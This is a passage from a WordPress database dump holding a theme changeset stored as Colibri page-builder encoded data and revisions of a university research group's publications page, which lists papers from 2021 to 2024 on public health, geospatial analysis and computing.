\"base64colibriH4sIAAAAAAACA61YS3OjOBD+LXvoo6aUdmySY4I3tXvb2j3MMSWjBjQjJEoSfvz7PYB42NhjnKnyAfVL-X3dLZAheQfEH94aQITVGyTvgGhERd0asbQ1y60N5AARMAXErFRaOoo+6-crbp6yoNrQmAJi7WztxxsJk5XWtZJcaE+t3STQh7WBnO+DiBDcJIiSc7bJFpLtsnSdPSyGmFndVANCH06axslJ8hkZKUyY5Gybjs8oaON8VzKUY3E41cN+WeODrYYU+2W03gvddOZPnLdWjVGhjwC4HrjpfwsB1yenijIMmLXtdjCN1l2lhSMT-h4qgy8sf+5dlJF0bHVdmmpquh56RrighI6h8GVE9L+Ud9KkCzPha+jaZAvr7exGz+ONLlNeLcxj83pvHrPb4f0MLc7s5UGG8DZDT0vzSB7MY9ioUZPx9-+RpiyQvDhHlP-L7slNNbHhrySwBMqmD1ZREOOkoqXvxwk3G8C0hd8Wo20WTDishzEsQ6WHcV2lUu0BuRRBMDJip0nCagvrFBCDa6h9ihaZ1WrnFMtsVVtDJvS2LT5WCye0Fsd5NzXEbgmPVpkW3ve6WhTUvxG4DydNDDeb-lnbTGjWlYzX1qugrGGOtAhqH1Ne-Qnr1AByQA6r9A-GGDsXjsBfhxZfMvdAwt5qpIgvjXm05fAW4-0zK7TdCc18LTJlCkAuWa7pCMiFVoVhKlDlmS4YGXkmrOSMsJVELpMZLvFeLm8weoeqpfwKBaxwSrLMmiCUITdhZGePNNZdzeyXSdyo-lk5V1dr5uxhkmfRhEDOM2cPTBfs6UxUyQsRnq33c377Oc89w1EtX2ZquVpWy0W83S6kswdA-qPxQeUnllkTyASmC5aRaef5XFfJ67pecdb0PjgKWXnZ+POKQRppzKw+pzuz+pzszOpJmTKrL8vUCmc89wzvo3wR8bfpj1+LPD5OmrQ-Q8pIgGiC7deVnK67RWy0V9Z9VF6023OnWYD2-hl8vjKDIzC5piPbCa-8CPnnpzLxDKmPsWolq4+xWCWrjwwB+Z4pY8hFm7jszOJyPHSvcyw8PnRf7Ibf5DjXUgf2xDkgL9np7FyOLHezOpHtmdCqMIB8KE0XqJ1LTzpvB1m4MJVWck7aih4k84vM3N+r6yu92rVNwmfaZj3bNshLRpoqMl9E-Vuw3z50um+V4ITpYAitR1m-d2x9Dle79RZShLdXQA7J+4mEg2TbLrwKxIyoCJLtN0CeOhKBJCDPrQPkuSMC5I1vv4u+Wyf-ceQ9IBdGfgFeBCkAeRCuoOET8HOnhfnZF7d0lA-4Q6g9rN4APwA-OqiH+ltmq56DtJXCKgX8EC0pg-GUl1UK+CHV-vE+fdT-Ec9lPvda-9rulsW87lw6XveX4rP7mBam6C9LknLR6OFvCXkyolLZxaXw6sXzfy2tfvYMEwAA\",\n                \"608\": \"base64colibriH4sIAAAAAAACA+1dS3PbuLL+LXeBqmRBFdSynWQpy48oiRMfK5lM7uZUi2yRGIMABwBla379XQAgKZl+hnPOrYmqUjMi+AI+9OPrBtFmb44ZwB9WKwbAJlP25pgBKCwpHAMUukpSrRwpxwAYzBhAWgiZGYo3HR7fc5+l1An-bJgxgMroynbfhCottPEtK5SW-HVbD5rV1umyeQY6Z7aeIbLm0rS59M0Je3PyvM4affPsAaZa1mU7Pus2krp9y8impDJUbqvLunZkug3+Od9F5opus9tU1DM438XmMF69RlmHy8ec+6tqJVzzBAaHLTbNP5htg3jE3ybpQTtnaEi5+c75Sfe8EyjjBUf87fMgdHTbCpaVOnRX1VI+1IG2g0JldOtP8v7BHD7aWes2kq5o5ZsPIDxoG-8dJbgjzJ0LPNyTWcUmp2wys85olbPJKXA4YJMZg7OmyR+GCys2OT1DI5bIgE9XRigGfG5QbRjMGPBFrTJtGfCpZMAX9bIQ-sRVvSQlkAE-1iYnBvxMakPWn50V5FAx4F-FDRoxYsCnMtdGuKK0DLjTDPgVZXVKDPixQEuWAReKAT8RltASA36FjhjwU+tEiY4sAz7D2lLGgC83DPgJOmTAF3VVGbJWaDViwNlkRiWbnM6np5-PGfC5cmQUOqEVSgb8g66N-6VXDPi0qqSgjAG-QFdQiU6k1oNEJZuc+hEBhwP-6-CAAX91+NofVdVofDS6g+kVlsKSc5vkQlxLMgHNkf--dyGlCFBNRww4gyMsKzY5biALOI4Y8EtDSWUoV6jSDQP+nUReOAZHamkrNjlGlTHgV5gKlMmpK5RIPYwVGuFEi+xlfEgytVanAh1lDPhMq0w4oVVzoSuIAV84j79eMeDnpE0ukE2mDPiUAb-UVS3RCa2SY-RzsnB1tunOwIdR0zEG3Pez6eB7QumKnZ52YeevgMPB67vgLkYM+OdRAPSOaE5HDPjViAGP2IdXX4zifz7WS7oOEGtlnalTJ1TOgM908iVNa2NIpcSAnxusCts84oSMWPsrz6TWGQP+RTktde5xXmnDgJ+qAlVKGQP+TWVkrEOVCZX7N0Z0vEjxBaVaZT1yOtNqRbEfWjHgc7Um5cSaGPCZLqs6dBrD-SttgvgCfzWfzWfz13cE+RhVjlIb7-n4XGUC70LMJrOl6TMWO8Zl8phxuaiXaAth2qmZMeBTW+jr7aZjXZuc9JZanI+iORGk-M8fIwb866iZO6VNuOMiNF5ql9FahOtPQyt1FUaOgnRNXo8Y8ItaKwZ8JetbBnyNRmBUh5LQ1qa1OFLfJKm2jgGvtHG4lMSAp9qWImXADW4Y8IwcpU6bVmxcQcIw4Kk2hrzWMOA3whUMuK0wJQb8htAVXlxTJ9bCbevSttU6J10VGytSlAz4FVlCkxZePRfhgZfFxvbZsjG8DaAAh8mHKZ+M3x1M7grBRXqCSpBkwE8-hWm5vsFVrRnwhW-4Zpao9NpebxjwD2EmotpNr0bAYTJiwI9JpUWJ5jpILAO+Quv8DRadsCuR+nNrKkQqiQE3upHw6D0aHavqpRQpA15EO0IlmZy8jawkKtVVDkO20sqSR4idAnvL2bvZudfhU6XrvGie-QH-+itecjJiwC+JzIdG6cgw4ItUkErpDmjnNyhRBVP0Pkjfrk2fMeBf4hvefSYhJQM+n7eS3Mw7OQYc5WjbNM4MYYAm1cqJvNa1ZcAtmbVIiQFHQ2gZcDS6VhkDXmmhnI3ykwlbkbL+EX7UhqyuTUr+rDNiWQdBzWrjL1wKnUSYBdluP89Ji8YA4VZ3dyGamhUy4Num4XeBOi1qxYC-p8ZK3Ai1bS4aOBq1PfNq+1tU2+jErghl4kRJjQwIZxnwWZ8ORpX53ujgtEcHGfDTxYIB-1KRYsCnJi28Nd6ZnjNamhrNhgGHNw2B6FGxRsHOaWkoF9rk0QJ+wpto-C+0QYMM+EeBOfVSrEjXCrRCCQa8n4FMrZfec1oauhbGOh0Nrl3hjbbWD8wadPGRFhUD-h3VH8LUwaqWwtQM+LEwBSoaBU5Q1tKJJBM2FZUUygOwMljSjTbXkfelulyiY8BTKUp0lAiV1d5bZmTJOAZc6rS2DPjSELWes65sbXJq7aqu3dIQXjfMhdA6MiqQ2RRHDPj0-BsDfoZSMuAXREFvpkvrDKbOtvPzkNd7kjuEx9zh1F0LZbVq+SA-C-bgI0rs+L6PoflBavgKOMDrEQM+Q5uiR4rTakVpq+qzL7-NT5Lxu8giqoa5MeClXgop3KaBFIVhwP+sUQq3CXRPMeB0W0ltWg1LZR1eV0mvO2mBBlNHRtjAQepgX3LSa2FrlOIvdIGln5O2FTpPDSMXnDHg4zev7LiH9U1VTlL8WRMDfjzqUugLITPvo6dZpqP21IYUA346+qGzKP4ztBZV5nVpxIB-0EVnOjaZog0D-mnkfWqjNp-IiVQgA-5hxID-0HUUyVMp-sIluYIBn5rSz3xyQcpi0c7OXGViLbK65cGRi8x0WdbKT8AnWpNkwM8wsocrkoGkO82AL1AJF6ZgxoB-R6-N-wqz5X2NIXQlKdfyXlSYU2jytrE2gWL6t3eChGmamiCH5wWqDuM-EyQbms+AX1Gljbs7UZdoUpIyTM7VyCsXjBjwKWVkGfALbf+shdMM+CkauWHAv6MJDnuxsY5K-95ZgVKS8jo-V45yE-3eZSQATSCxqM2ahJToreYJOhx1Qpc2ovmmMjK5waz2xw192iHdr84X365mIdKbOonKRWimPWFJWtRFyzrjoONMH9dCZi37MWSFFH5OSJHJNwx4bkTmB57RmqSuwqTpFQOOigGvzRJVYlOUxICXOiPZOPDmMZWhTKRB0+L7-1MwTBWqrGPIdmB4tghsz7oPFkNiQK2F0aok5VCGCbfk7H9h0OdoZDPsq55hny++MeCv+voj1mSscJvXvgsOU8eAfyZ3o8217YR3jsyalBNa-TeG2EYDngGUyIB-8o7pPSmzYcAvC1S+5bJWRI4BXwiVF75tl7JMjpvBTU3pDVMTPnTNxukaZd3ovXakgt84va20rQ0x4FfCNgzjHK0zWihH1gkfNIWsUjLD6JQWFaWiJGUZcFx5Q3qi07ok5U3ud7SOboKJXVRCytZIerBGDPilDpSqMmTjreiC2SzJiBQ9pfIpF+8-YwyXG6wKiiHsVCnvIlqW4iF4KR8ZP8ZHPmvjChJloCAPhCtdHvKlqnR0gB8iDxm-HnkbvPJ0QP+llbdRSjhtusFYpaVIN61nybtcIKNUWI+SratKG8eAO61bO2drESNvqdMtSLdeZh1upbVqs0QVQ6NRjwGJMd32aC99b0PofOR-HLxNDt+NXh79dV+wRdCb5FWLaRT-dpgF1S3L8qD4nF2VlJQJVAx4ZfRSRiO6CA7D498Fu-RN3Yhv1Il0g2R2kGqe8i3A6Y11uPBtSC2M+fjosCcx+lWbJks8HTHgvz0RpHuYcwemS6NzQ7aNBVJtvR9p4mLrHW8nVzJlwPNaZNRKV1poiZ3kTWUwdcIJrch4sek8eNE8eMaAH7xrRg9Hb0ZPVLcLNNf2-pH3sv5tyfDi3sxqhc6RUU0EYAltSCpGraTWcobgWKUii8nGVciYCINOm81OcsVoXTLga2F9RO3T9igl2uTM6+t3bVzRyZzMGPCADY3H-KhHMt7jRkUcT54Hw6LClGKsP5NorViJxjDM-XpNmN6ptWSDC+hERu+1s5V2dsSAl5Rd3Yr13S7u2r1ndPF8vmigXjQTdUXBawRDdZfzBgYvrHVUWR9LbPc8PFOUQqJhwM9qVxuyDPirqhox4AfjN8lBCEQWlREqb8KhAsueUe4mprazq1rSdtNzTNmUAV9sFJlcWCdSv-xiNKZF9N0n6DA5MWJNPokT0nbAL0NKb+S9OQa3W1ImUqFaQb6bGKwMVWgoU2SDfI0PX0HgPTCBBCZv78LQWQU7G3US1fMN7WSzuytfVyMG-PgFyHwtiAG-qKUTSVX4BbBWo0tymDRW-wUJUWdQ2Uob1wTgaH4X64COEd6um9-Fmk2mMOZvRvxgDId3YfmXwBh9xsx9oW9KkV5vr3E9KEUPL489S6CqSm7aqOrS6CUuhYwwzdUqfhLAL7aCJevqbNNmUDH3F1VGp2Q7y5Fpw8hVYOSju2uI3lu2SzcNkYgLhsEpHIz7OENIqv0ripM25XKzbQg-iG2IFigdrrQpMc9FSHkc37+SsovqMW2w6AjsdFcWhWXA32N6TYYB-6j0je0uKEwZ8BMKmebYCnx6g4YY8AtRitRsGPCpc5i26bnZZkkmuWwXLgJ3GDHg89PTUwb8q0FlMY3ETSsG-IQqUlmgfMHeUeq9V7MO1uNRaozW+kdcMcIA5P9Ge4a7Bv13QduXbAF3zyqVBy88qFbkbT6W5DXb+9C4TnppxBrTjRdX18inl8uZVo5uXRKxbAlGzFV-0ipPvpIpGfCv3uctyPgUTsx5zBUDPp+FxOY4CeA+vsQYMkJpw5yDExknR6-jLPUsd2sbF+iiuH1q1+COfxbIae200qVf4vikMWPAj1GiCitG8bsBz2ApY8Dfoy0Y8K+4lGQZ8G-R5Re1Ud11OQZ8sVkK2QhrA5-vCL8Huks0KCW1C9vb77-0diSmM8pKW1GXnhld20JXfo328uRy8f11C-PRZJwcHfAHoP5aoKnoUY1v1k63OPT2sms-1gx4phPhko2ujSW58in7uO61jsHZMkiz0Uvtje3Sp9hdYfSNdzlC+UB+riIklAmVN8TU4z9+59OnMfp9XEov9FJI2o09plUlW8mddWxFo0IB5kN+mBzyo9dPshmfxLa-+37HZNyxKk+X9BC5RINQdQ0CllrlHlDyls8JV5ATaVKhcd0vDtJgNTBYjRjv9PiqkFhq0Omsad4FcPxuHJ3XZDzuoQMLkRVoXIFq20H1rPA-BkpHGr+kTi-JhNy5I6PIba1urgUy4N+mv3lfVFsyDHhKyhmRBoE1VJCyfn0OncP0mgG3TX4CFcqNFfYJ8glePmcXDPh3YUj6KLNzycLVGam4lrTc3HPCI94N2Nvz-NVi8rpjILq2F3ok9Yeu1RZ+EedFrTIyBss4J1cxziT3V0OmLl4mqic+Lx1WflobWBmdGyzLbprH6pVjwO21kNK24XZl9B+Uuo4JkdRkfjGEAz2C+4jF7XwQ4yl+zEQcjpPxUc-a6w-aTtP8aPT695iTwGtMt+G6F9wujl221sFuXlZGh6+HHN26xOlElJgTA243yhVkRXfZLNXKGbThg58I0pO4Oxz0rTZPl7SxQuXFjv9YFJENRr555r8e6KYk3qMxoknA9A27F5uumfuy+DT9HNijsKQcqlxGv4yupTiX2orG-PvJ-oQqrz1WpFKdeS-rP8U5LZeUZULl9kngTA6hh4YvjCgxLkJGMxZl5EfDu8111KCPPycSdy3d+7r0qeLw6QEDfkWpzpWIDNHokgG-Oj9mwH8TGWkGfOEMYdnlOOOTZPb5s72HyCxKNO67NjKsVnxbij9r4Ty5mitHUoq8Jw26o1-TbB2-cdtKgZja9urjIkUZGHz307WdN2xxz9m29fdGgHTVDQNKNI4Bn3m45krpdcz7vOqO9Gwxm36afblgcPZtPmNwNv06Y3A2-3LJ4Gwxm3c4GLw7TCYcHuBge9P7k6b3oyShLFq7C0kfu51e1-HLiM9NstjU5Z08+5MU8UGgIfA6VDWaTUDdUbr1neVlWF311F4SVds6G833sdAlBT6yIGW12Q3Q-Bv5+MAVTwvOvly0CtJlv1sj-Hz69Uab6wUD-mr25WLx+fTroiPe43cJHPQKd-Op-uFJ71fq43cPf6XeuVM89Pl+z9f18Nwv5sdvX9wXeKQv42f35c2L+-L8d00efRfMGEBJDrt7BeJjbLM9wj-Kd97D6Sf4ADg7bDdqFK6U3R0GmVgz4Bk6TFItxdKIRGRscsIOZ+2gDmcMgAFPJVrbnLRuIyk5GE8YcP9b6hRlEpHgVXD7if9Ab03hQZNTdjhTDLj-Fu9-kiRJdht7+pXqstKKlGt7EGKr2L8HhwHNZZ0zYRdM-wCLdgMSb34nudRLlImtMKQrsmQl6ZYBRylylQhHpU1knqSkfBzWbS+z-vamMaL6pg9VeCqqD2D7hFMe-HvASHIjsiTVyqFQZLawWepb6p67t2ePduIBOdid2Mm902f0zVZH89o5MjYx+iaReQI7TWV2p4nvHK-77lv33blOoDObb-tmc-K82XwWcg9Ppc-o-FFbJ1abuD1vS2Z3z3Xldvdcr0DLPLHOkEuLuxrQf6JtjTimWu7inWq5i3aq5dY8pVrenSff2HPnOoGnQf4s4B+GP2774-HnlpQ29qSIAGDtdHNcZtvH4SBK2rsk7A68K28H4dQzhvsMNTy4Rw07w1lJuk2W6MPiOPZ--1uoaEeq2zhvRVLdxukqkuo2AQZ8nQilyMRr4mG4LB529e5dLw4v17ufFIiBbuyTqptkzDkDXiSbHeMcYW5oRadtnaAUud8uE+cmPMirpiW58rrsI7NOa5n1tfqmF4L5k8g8Q1oP73UafkMp9z86pKMRKuB9QnXYK1TAi4Sk-1j3pzAZBJlBH9InhEOMMT7-eXtfh3nffu-si-fO-uwEAO-bfjvMtO637w6wffcn-93d-TvM3O53D7949-AgKvvYBuSBHMEgfW2+s-75Tg08vCdvwx7mfftt3P-ftnEPIt+P7wQfSHz2O8mfs5N8GND3O9Ef2Ik+DMT7neyDQbnfCf-0nfCD2P6-fTP9P5yB-VIEE-5ugrkvjPCCwggDQb8vrPDMwgqDqP5-uDbDMLLy69V2GCjp9KvXhhjKVP1StSUGigP-ybUphs5P7GtbPK22xSAucPjyGHtu-3xuP-67uf2+yMhQRUb+w4nBX69IyTAA-6pFTv5Oc-GrF0kZBtv-10VWhhniP71Iy0Ao-epFXoaBcV8kZqdIzDCw7ovMDFdkZiDOuC9SM3SRmoE8+r7Izc8WuRkk2n+kTs5A36Xu6+z8VJ2dIWf6oVI9A4WR+1I-Ly71M+RM91UL+tuM977aUG+1oYGW4fbVioapVjSMej214NEwk7+v2vHiqh0DTcAvVHBpoPXufcGmvoJNAzmDfcGnAQs+DeIR-pE1o-be6x-hvfY1qwaoWTWIlRi47NXP7GlncJaJ9csLD7z0-pfc+bx7nnr149c9dEX-ud3W7nHzV7h3C2VJVHlTqCqjFday-dvZ2UZhKdI7f-j9-jJa-we8fiNYqn4AAA==\"\n            }\n        },\n        \"type\": \"theme_mod\",\n        \"user_id\": 1,\n        \"date_modified_gmt\": \"2024-11-07 19:48:26\"\n    }\n}','','','trash','closed','closed','','69964bd2-275f-488d-830f-d8dc702b1cbe','','','2024-11-07 14:48:26','2024-11-07 19:48:26','',0,'https://gsudice.dataconn.net/?p=1867',0,'customize_changeset','',0),(1868,1,'2024-11-07 14:48:27','2024-11-07 19:48:27','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2024<\\/strong><\\/p><p>Fariba Afrin Irany, Sundos Al Subhi, Rubenia Borge Flores, Chetan Tiwari. Algorithms to Reduce Biases in Disease Rate Estimates Caused by Data Suppression. <em>IAENG International Journal of Applied Mathematics<\\/em>, 2024, 54 (5), pp.16.<\\/p><p>Ramisetty-Mikler, S., Willis, A. &amp; Tiwari, C. Pre-pregnancy Weight&nbsp;and Racial-Ethnic Disparities in Pregnancy-Associated Conditions in the State of Georgia: A Population-Based Study. <em>J. Racial and Ethnic Health Disparities<\\/em> (2024).<\\/p><p>S. N. S. Al Subhi, A. R. Mikler and M. M. Kubek, Constructing Co-Occurrence Graphs and Deriving Flood Ontologies for Enhanced Understanding, <em>2024 Second International Conference on Inventive Computing and Informatics (ICICI)<\\/em>, Bangalore, India.<\\/p><p><br><\\/p><p><strong>2023<\\/strong><\\/p><p>Mubashir, A., Ashok, A., Bourgeois, A. G., Chien, Y. T., Connors, M., Potdevin, E., et&nbsp;al. (2023). Muon flux variations measured by low-cost portable cosmic ray detectors and their correlation with space weather activity. <em>Journal of Geophysical Research: Space Physics<\\/em>, 128, e2023JA031943.<\\/p><p>McDaniel EL, Akwafuo S, Urbanovsky J, Mikler AR.2023. Benchmarking a fast, satisficing vehicle routing algorithm for public health emergency planning and response: \\u201cGood Enough for Jazz\\u201d. PeerJ Computer Science<\\/p><p>Gwalani, H., Tiwari, C., O\\u2019Neill II, M. <em>et al.<\\/em> Creating contiguous service areas around points of dispensing for resource distribution during bio-emergencies. <em>Geoinformatica.<\\/em><\\/p><p>Arfa Mubashir, Xiaochun He, Ashwin Ashok, et al. Muon Flux Variation in Real-time and its Correlation with Space Weather Activity. <em> ESS Open Archive .<\\/em> February 27, 2023.<\\/p><p>Daniel Gebregiorgis, Lawrence Morara Kiage, Chetan Tiwari, Suhasini Ramisetty-Mikler, Aster Gebrekirstos, Asfawossen Asrat, Susan Wanjiru, Emiru Birhane. A multi-disciplinary framework to combat climate-induced desert locus breeding, upsurges and outbreaks in eastern Africa. AGU Fall Meeting Abstracts, 2023<br><\\/p><p><br><\\/p><p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and&nbsp;Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',612,'https://gsudice.dataconn.net/?p=1868',0,'revision','',0),(1869,1,'2024-11-07 14:48:27','2024-11-07 19:48:27','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2024</strong></p>\n                    <p>Fariba Afrin Irany, Sundos Al Subhi, Rubenia Borge Flores, Chetan Tiwari. Algorithms to Reduce Biases in Disease Rate Estimates Caused by Data Suppression. <em>IAENG International Journal of Applied Mathematics</em>, 2024, 54 (5),\n                      pp.16.</p>\n                    <p>Ramisetty-Mikler, S., Willis, A. &amp; Tiwari, C. Pre-pregnancy Weight&nbsp;and Racial-Ethnic Disparities in Pregnancy-Associated Conditions in the State of Georgia: A Population-Based Study. <em>J. Racial and Ethnic Health Disparities</em>                      (2024).</p>\n                    <p>S. N. S. Al Subhi, A. R. Mikler and M. M. Kubek, Constructing Co-Occurrence Graphs and Deriving Flood Ontologies for Enhanced Understanding, <em>2024 Second International Conference on Inventive Computing and Informatics (ICICI)</em>,\n                      Bangalore, India.</p>\n                    <p>\n                      <br>\n                    </p>\n                    <p><strong>2023</strong></p>\n                    <p>Mubashir, A., Ashok, A., Bourgeois, A. G., Chien, Y. T., Connors, M., Potdevin, E., et&nbsp;al. (2023). Muon flux variations measured by low-cost portable cosmic ray detectors and their correlation with space weather activity. <em>Journal of Geophysical Research: Space Physics</em>,\n                      128, e2023JA031943.</p>\n                    <p>McDaniel EL, Akwafuo S, Urbanovsky J, Mikler AR.2023. Benchmarking a fast, satisficing vehicle routing algorithm for public health emergency planning and response: “Good Enough for Jazz”. PeerJ Computer Science</p>\n                    <p>Gwalani, H., Tiwari, C., O’Neill II, M. <em>et al.</em> Creating contiguous service areas around points of dispensing for resource distribution during bio-emergencies. <em>Geoinformatica.</em></p>\n                    <p>Arfa Mubashir, Xiaochun He, Ashwin Ashok, et al. Muon Flux Variation in Real-time and its Correlation with Space Weather Activity. <em> ESS Open Archive .</em> February 27, 2023.</p>\n                    <p>Daniel Gebregiorgis, Lawrence Morara Kiage, Chetan Tiwari, Suhasini 